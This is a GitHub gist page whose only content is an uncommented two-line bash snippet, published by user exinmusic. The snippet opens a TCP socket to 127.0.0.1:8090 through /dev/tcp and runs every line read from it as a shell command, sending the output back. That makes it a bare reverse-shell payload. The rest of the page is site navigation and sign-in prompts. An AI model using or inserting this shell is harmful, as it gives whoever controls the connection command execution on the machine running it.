Skip to content

Instantly share code, notes, and snippets.

@exinmusic
Created August 25, 2022 07:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save exinmusic/f6278dd3e6d05a2d5f907a9ae9ebff02 to your computer and use it in GitHub Desktop.
Save exinmusic/f6278dd3e6d05a2d5f907a9ae9ebff02 to your computer and use it in GitHub Desktop.
exec 5<>/dev/tcp/127.0.0.1/8090
cat <&5 | while read line; do $line 2>&5 >&5; done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment